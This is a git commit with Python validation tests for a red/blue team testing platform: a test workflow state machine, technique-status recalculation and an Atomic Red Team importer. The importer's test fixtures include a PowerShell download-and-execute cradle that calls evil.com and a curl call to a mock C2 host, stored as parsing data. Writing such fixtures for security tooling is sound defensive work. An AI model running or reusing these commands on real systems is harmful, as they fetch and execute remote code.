feat(phase-11): implement Red/Blue business logic services (T-106, T-107, T-108)

T-106: Create test_workflow_service.py with state-machine transitions for the complete test lifecycle (draft -> red_executing -> blue_evaluating -> in_review -> validated/rejected), dual validation by Red/Blue leads, and reopen capability with field cleanup.

T-107: Update status_service.py to use detection_result from Blue Team instead of legacy result field, and differentiate between partial progress (some validated) vs all-in-progress states.

T-108: Create atomic_import_service.py that downloads the Atomic Red Team repo as a ZIP (avoiding API rate limits), parses all atomics YAML files, and creates idempotent TestTemplate records mapped to MITRE techniques.

Includes validation tests for all three tasks (19 checks total).
This commit is contained in:
2026-02-09 09:58:54 +01:00
parent 086cc5c8bc
commit 7af6be10be
23 changed files with 2053 additions and 45 deletions

View File

@@ -0,0 +1,344 @@
"""Validation tests for T-106: Test Workflow Service.
Uses mock objects to avoid needing a running database.
The database module is stubbed before any app imports.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock, patch
from types import ModuleType
from datetime import datetime
# ---------------------------------------------------------------------------
# 0. Stub heavy dependencies BEFORE importing any app modules
# ---------------------------------------------------------------------------
# Ensure backend/ is on sys.path
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Stub pydantic_settings so config doesn't fail
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
# Stub app.config
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
# Stub app.database so no real engine is created
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
# Stub taxii2client
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client"] = ModuleType("taxii2client")
sys.modules["taxii2client.v20"] = taxii_v20
# Stub jose
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
# Stub boto3
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
# Stub apscheduler
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Now we can safely import
# ---------------------------------------------------------------------------
from app.models.enums import TestState
from app.services.test_workflow_service import (
VALID_TRANSITIONS,
can_transition,
transition_state,
start_execution,
submit_red_evidence,
submit_blue_evidence,
validate_as_red_lead,
validate_as_blue_lead,
check_dual_validation,
reopen_test,
)
# We also need HTTPException for assertions
from fastapi import HTTPException
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test(state: TestState = TestState.draft, **kwargs) -> MagicMock:
t = MagicMock()
t.id = uuid.uuid4()
t.name = "Mock Test"
t.technique_id = uuid.uuid4()
t.state = state
t.red_validation_status = kwargs.get("red_validation_status", None)
t.blue_validation_status = kwargs.get("blue_validation_status", None)
t.red_validated_by = None
t.red_validated_at = None
t.red_validation_notes = None
t.blue_validated_by = None
t.blue_validated_at = None
t.blue_validation_notes = None
t.execution_date = None
return t
def _make_user(role: str = "red_tech") -> MagicMock:
user = MagicMock()
user.id = uuid.uuid4()
user.role = role
return user
def _make_db() -> MagicMock:
return MagicMock()
# ---------------------------------------------------------------------------
# 1. draft -> red_executing works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_red_executing(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
result = start_execution(db, test, user)
assert result.state == TestState.red_executing
assert result.execution_date is not None
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition draft -> red_executing works")
# ---------------------------------------------------------------------------
# 2. draft -> validated fails (not allowed)
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_validated_fails(mock_log):
test = _make_test(TestState.draft)
user = _make_user("admin")
db = _make_db()
try:
transition_state(db, test, TestState.validated, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 400
print(" [PASS] Transition draft -> validated correctly fails")
# ---------------------------------------------------------------------------
# 3. red_executing -> blue_evaluating works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_red_executing_to_blue_evaluating(mock_log):
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
db = _make_db()
result = submit_red_evidence(db, test, user)
assert result.state == TestState.blue_evaluating
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition red_executing -> blue_evaluating works")
# ---------------------------------------------------------------------------
# 4. check_dual_validation -> validated when both approved
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_both_approved(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
user_blue = _make_user("blue_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "approved", "LGTM")
validate_as_blue_lead(db, test, user_blue, "approved", "Detection OK")
assert test.state == TestState.validated
print(" [PASS] check_dual_validation -> validated when both approved")
# ---------------------------------------------------------------------------
# 5. check_dual_validation -> rejected when one rejects
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_one_rejected(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "rejected", "Insufficient evidence")
assert test.state == TestState.rejected
print(" [PASS] check_dual_validation -> rejected when one rejects")
# ---------------------------------------------------------------------------
# 6. reopen_test clears validation fields
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_reopen_clears_validation(mock_log):
test = _make_test(
TestState.rejected,
red_validation_status="rejected",
blue_validation_status="approved",
)
user = _make_user("red_lead")
db = _make_db()
result = reopen_test(db, test, user)
assert result.state == TestState.draft
assert result.red_validation_status is None
assert result.blue_validation_status is None
assert result.red_validated_by is None
assert result.red_validated_at is None
assert result.red_validation_notes is None
assert result.blue_validated_by is None
assert result.blue_validated_at is None
assert result.blue_validation_notes is None
db.commit.assert_called()
print(" [PASS] reopen_test clears validation fields and moves to draft")
# ---------------------------------------------------------------------------
# 7. Every transition generates an audit log
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_transitions_generate_audit_logs(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
start_execution(db, test, user)
assert mock_log.call_count >= 1
c1 = mock_log.call_count
submit_red_evidence(db, test, user)
assert mock_log.call_count > c1
c2 = mock_log.call_count
submit_blue_evidence(db, test, user)
assert mock_log.call_count > c2
print(" [PASS] Each transition generates an audit log")
# ---------------------------------------------------------------------------
# 8. can_transition correctness
# ---------------------------------------------------------------------------
def test_can_transition_map():
test = _make_test(TestState.draft)
assert can_transition(test, TestState.red_executing) is True
assert can_transition(test, TestState.validated) is False
assert can_transition(test, TestState.blue_evaluating) is False
test.state = TestState.red_executing
assert can_transition(test, TestState.blue_evaluating) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.blue_evaluating
assert can_transition(test, TestState.in_review) is True
test.state = TestState.in_review
assert can_transition(test, TestState.validated) is True
assert can_transition(test, TestState.rejected) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.rejected
assert can_transition(test, TestState.draft) is True
test.state = TestState.validated
assert can_transition(test, TestState.draft) is False
assert can_transition(test, TestState.rejected) is False
print(" [PASS] can_transition map is correct")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-106 Validation: Test Workflow Service")
print("=" * 50)
test_draft_to_red_executing()
test_draft_to_validated_fails()
test_red_executing_to_blue_evaluating()
test_dual_validation_both_approved()
test_dual_validation_one_rejected()
test_reopen_clears_validation()
test_transitions_generate_audit_logs()
test_can_transition_map()
print("=" * 50)
print("ALL T-106 validations PASSED!")

View File

@@ -0,0 +1,229 @@
"""Validation tests for T-107: Updated status recalculation service.
Verifies the new logic that considers dual validation and detection_result.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Only stub if not already stubbed (in case tests run together)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from app.models.enums import TechniqueStatus, TestState, TestResult
from app.services.status_service import recalculate_technique_status
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test_obj(state, detection_result=None):
"""Create a mock test with the given state and detection_result."""
t = MagicMock()
t.state = state
t.detection_result = detection_result
return t
def _make_technique(tests=None):
"""Create a mock technique."""
technique = MagicMock()
technique.tests = tests or []
technique.status_global = None
return technique
def _make_db():
return MagicMock()
# ---------------------------------------------------------------------------
# 1. Sin tests -> not_evaluated
# ---------------------------------------------------------------------------
def test_no_tests():
technique = _make_technique([])
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_evaluated
db.commit.assert_called()
print(" [PASS] No tests -> not_evaluated")
# ---------------------------------------------------------------------------
# 2. Todos validated con detection=detected -> validated
# ---------------------------------------------------------------------------
def test_all_validated_all_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.validated
print(" [PASS] All validated, all detected -> validated")
# ---------------------------------------------------------------------------
# 3. Algunos validated, otros en progreso -> partial
# ---------------------------------------------------------------------------
def test_some_validated_some_in_progress():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.red_executing, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] Some validated, some in progress -> partial")
# ---------------------------------------------------------------------------
# 4. Todos en estados intermedios -> in_progress
# ---------------------------------------------------------------------------
def test_all_intermediate():
tests = [
_make_test_obj(TestState.red_executing, None),
_make_test_obj(TestState.blue_evaluating, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.in_progress
print(" [PASS] All intermediate -> in_progress")
# ---------------------------------------------------------------------------
# 5. Todos validated con detection=not_detected -> not_covered
# ---------------------------------------------------------------------------
def test_all_validated_not_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.not_detected),
_make_test_obj(TestState.validated, TestResult.not_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_covered
print(" [PASS] All validated, not_detected -> not_covered")
# ---------------------------------------------------------------------------
# Bonus: All validated with partially_detected -> partial
# ---------------------------------------------------------------------------
def test_all_validated_partially_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.partially_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] All validated, partially_detected -> partial")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-107 Validation: Status Service Recalculation")
print("=" * 50)
test_no_tests()
test_all_validated_all_detected()
test_some_validated_some_in_progress()
test_all_intermediate()
test_all_validated_not_detected()
test_all_validated_partially_detected()
print("=" * 50)
print("ALL T-107 validations PASSED!")

View File

@@ -0,0 +1,355 @@
"""Validation tests for T-108: Atomic Red Team Import Service.
Tests the YAML parsing logic and deduplication using synthetic data.
The download test is marked as optional (requires network).
"""
import sys
import os
import uuid
import tempfile
import shutil
from unittest.mock import MagicMock, patch, PropertyMock
from types import ModuleType
from pathlib import Path
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
import yaml
from app.services.atomic_import_service import (
_parse_yaml_files,
_extract_zip,
import_atomic_red_team,
ATOMIC_RT_ZIP_URL,
)
# ---------------------------------------------------------------------------
# Helpers — create a synthetic atomics directory
# ---------------------------------------------------------------------------
def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path:
"""Create a fake atomics/ directory with YAML files.
Parameters
----------
techniques : dict
Mapping from technique ID (e.g. "T1059.001") to a list of test dicts.
"""
atomics = Path(tmp_dir) / "atomics"
atomics.mkdir(parents=True, exist_ok=True)
for tech_id, tests in techniques.items():
tech_dir = atomics / tech_id
tech_dir.mkdir(exist_ok=True)
yaml_data = {
"attack_technique": tech_id,
"display_name": f"Technique {tech_id}",
"atomic_tests": tests,
}
yaml_path = tech_dir / f"{tech_id}.yaml"
with open(yaml_path, "w", encoding="utf-8") as fh:
yaml.dump(yaml_data, fh)
return atomics
# ---------------------------------------------------------------------------
# 1. Parsing creates correct TestTemplate-like dicts
# ---------------------------------------------------------------------------
def test_parse_creates_templates():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "PowerShell Invoke-Expression",
"description": "Runs a PS command",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')",
},
},
{
"name": "PowerShell Base64 Encoded",
"description": "Runs base64-encoded PS",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "powershell -enc ZQBjaA==",
},
},
],
"T1053.005": [
{
"name": "Scheduled Task Creation",
"description": "Creates a scheduled task",
"supported_platforms": ["windows", "linux"],
"executor": {
"name": "command_prompt",
"command": "schtasks /create /tn test /tr calc.exe",
},
},
],
})
results = _parse_yaml_files(atomics)
assert len(results) == 3, f"Expected 3 tests, got {len(results)}"
# Verify atomic_test_id format
ids = {r["atomic_test_id"] for r in results}
assert "T1059.001-0" in ids
assert "T1059.001-1" in ids
assert "T1053.005-0" in ids
# Check source is "atomic_red_team" (via source_url)
for r in results:
assert "atomic-red-team" in r["source_url"]
# Check platforms
for r in results:
if r["technique_id"] == "T1053.005":
assert "windows" in r["platforms"]
assert "linux" in r["platforms"]
print(" [PASS] Parsing creates correct templates with source and valid data")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 2. Running twice does not duplicate
# ---------------------------------------------------------------------------
@patch("app.services.atomic_import_service.TestTemplate")
@patch("app.services.atomic_import_service.log_action")
@patch("app.services.atomic_import_service._download_zip")
def test_no_duplicates(mock_download, mock_log, MockTestTemplate):
"""Import twice with same data — second run should skip everything."""
import io
import zipfile
# Make TestTemplate() return a mock each time
MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs)
# Keep atomic_test_id queryable
MockTestTemplate.atomic_test_id = MagicMock()
MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True)
# Build a fake ZIP
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_")
try:
atomics = _create_fake_atomics(
os.path.join(tmp_dir, "atomic-red-team-master"),
{
"T1059.001": [
{
"name": "Test One",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo test"},
},
],
},
)
# Create a ZIP from the tmp_dir
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as zf:
root = Path(tmp_dir)
for file_path in root.rglob("*"):
if file_path.is_file():
arcname = str(file_path.relative_to(root))
zf.write(file_path, arcname)
zip_bytes = zip_buffer.getvalue()
mock_download.return_value = zip_bytes
# --- First import ---
# Mock DB: no existing templates
db = MagicMock()
mock_query = MagicMock()
mock_query.filter.return_value.all.return_value = []
db.query.return_value = mock_query
added_templates = []
def track_add(template):
added_templates.append(template)
db.add.side_effect = track_add
result1 = import_atomic_red_team(db)
assert result1["created"] == 1
assert result1["skipped_existing"] == 0
# --- Second import ---
# Now DB returns the existing template
db2 = MagicMock()
mock_query2 = MagicMock()
# Return the atomic_test_id that was already created
mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)]
db2.query.return_value = mock_query2
added2 = []
db2.add.side_effect = lambda t: added2.append(t)
result2 = import_atomic_red_team(db2)
assert result2["created"] == 0
assert result2["skipped_existing"] == 1
assert len(added2) == 0
print(" [PASS] Running twice does not duplicate templates")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 3. Templates mapped correctly to MITRE techniques
# ---------------------------------------------------------------------------
def test_templates_mapped_to_techniques():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "Test",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo hi"},
},
],
"T1071.001": [
{
"name": "HTTP C2",
"description": "HTTP-based C2",
"supported_platforms": ["linux"],
"executor": {"name": "bash", "command": "curl http://c2.evil"},
},
],
})
results = _parse_yaml_files(atomics)
technique_ids = {r["technique_id"] for r in results}
assert "T1059.001" in technique_ids
assert "T1071.001" in technique_ids
for r in results:
assert r["technique_id"].startswith("T")
print(" [PASS] Templates mapped correctly to MITRE techniques")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 4. Service module structure is correct
# ---------------------------------------------------------------------------
def test_service_module_structure():
"""Verify the service has all expected public functions."""
from app.services import atomic_import_service as svc
assert hasattr(svc, "import_atomic_red_team")
assert callable(svc.import_atomic_red_team)
assert hasattr(svc, "ATOMIC_RT_ZIP_URL")
assert "github.com" in svc.ATOMIC_RT_ZIP_URL
print(" [PASS] Service module has correct structure")
# ---------------------------------------------------------------------------
# 5. ZIP URL is correct (no rate-limit concern with ZIP download)
# ---------------------------------------------------------------------------
def test_zip_url_no_rate_limit():
"""The URL should be a direct ZIP download, not an API endpoint."""
assert "/archive/" in ATOMIC_RT_ZIP_URL
assert "api.github.com" not in ATOMIC_RT_ZIP_URL
print(" [PASS] ZIP download URL avoids API rate limits")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-108 Validation: Atomic Red Team Import Service")
print("=" * 55)
test_parse_creates_templates()
test_no_duplicates()
test_templates_mapped_to_techniques()
test_service_module_structure()
test_zip_url_no_rate_limit()
print("=" * 55)
print("ALL T-108 validations PASSED!")